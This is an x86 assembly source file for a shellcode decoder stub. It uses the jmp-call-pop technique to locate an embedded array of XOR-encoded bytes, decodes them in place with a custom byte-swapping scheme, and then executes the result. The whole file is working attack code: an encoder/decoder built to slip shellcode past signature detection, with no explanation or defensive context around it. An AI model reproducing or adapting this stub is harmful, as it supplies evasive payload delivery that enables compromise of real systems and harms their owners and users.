global _start			

section .text
_start:
	jmp short call_shellcode

decoder:
	pop esi
	xor eax, eax ;al for first byte
	cdq ;dl for XOR
	xor ebx, ebx ; bl for third byte
	xor ecx, ecx ; as a counter


decode:
	mov al, [esi+ecx]
	mov bl, [esi+ecx+1]
	mov dl, [esi+ecx+2]
	xor al, dl
	xor bl, dl
	mov byte [esi], bl
	mov byte [esi+1], al
	add esi, 2
	inc ecx
	cmp ecx, 13
	jz short EncodedShellcode
	jmp decode

call_shellcode:

	call decoder
	EncodedShellcode: db 0x25,0xd4,0xe5,0xee,0xd6,0x86,0x0c,0x0c,0x23,0x92,0x89,0xfa,0x92,0xd5,0xbd,0x2d,0x26,0x44,0x35,0xd2,0xbc,0xff,0x4c,0xaf,0xf6,0x9d,0x14,0x5e,0x84,0xd7,0xc8,0x99,0x78,0x55,0x93,0x98,0x67,0x77,0xf7
